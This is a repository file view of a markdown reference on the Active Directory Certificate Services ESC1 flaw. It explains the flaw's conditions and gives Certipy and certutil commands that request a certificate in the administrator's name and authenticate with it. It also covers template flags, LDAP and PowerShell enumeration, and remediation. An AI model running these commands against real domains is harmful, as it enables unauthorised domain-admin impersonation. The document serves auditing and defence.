creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-12 14:14:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
d5f3fa32486ea335db802d68fe2147fa2da69583
Anthropic-Cybersecurity-Skills/skills/exploiting-active-directory-certificate-services-esc1/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal 
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

2.1 KiB
Raw Blame History

API Reference: AD CS ESC1 Vulnerability

ESC1 — Enrollee Supplies Subject Alternative Name

Vulnerability Conditions

  1. Template allows enrollee to supply SAN (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
  2. Template has Client Authentication EKU (OID 1.3.6.1.5.5.7.3.2)
  3. Low-privileged users (Domain Users) can enroll
  4. No manager approval required

Certipy — AD CS Auditing Tool

Find Vulnerable Templates

certipy find -u user@domain.local -p password -dc-ip 10.10.10.1 -vulnerable

Request Certificate with SAN (ESC1)

certipy req -u user@domain.local -p password -dc-ip 10.10.10.1 \
    -ca CORP-CA -template VulnerableTemplate \
    -upn administrator@domain.local

Authenticate with Certificate

certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1

certutil — Windows Built-in

List Templates

certutil -v -template
certutil -catemplates
certutil -TCAInfo

Request Certificate

certutil -submit -attrib "SAN:upn=admin@domain.local" request.req

Certificate Template Flags

msPKI-Certificate-Name-Flag

Value Name Risk
0x00000001 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT CRITICAL
0x00010000 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME CRITICAL

msPKI-Enrollment-Flag

Value Name
0x00000002 CT_FLAG_PEND_ALL_REQUESTS (manager approval)
0x00000020 CT_FLAG_AUTO_ENROLLMENT

LDAP Queries for AD CS

Find templates with ENROLLEE_SUPPLIES_SUBJECT

(&(objectClass=pKICertificateTemplate)
  (msPKI-Certificate-Name-Flag:1.2.840.113556.1.4.804:=1))

Find CAs

(objectClass=pKIEnrollmentService)

PowerShell — PSPKI Module

Install

Install-Module -Name PSPKI

Get Templates

Get-CertificateTemplate | Where-Object {
    $_.Flags -band 1  # ENROLLEE_SUPPLIES_SUBJECT
} | Select-Object Name, Flags, OID

Remediation

  1. Remove CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT from template flags
  2. Require CA manager approval for certificate issuance
  3. Restrict enrollment permissions to specific security groups
  4. Enable certificate auditing (Event ID 4887)
Reference in New Issue View Git Blame Copy Permalink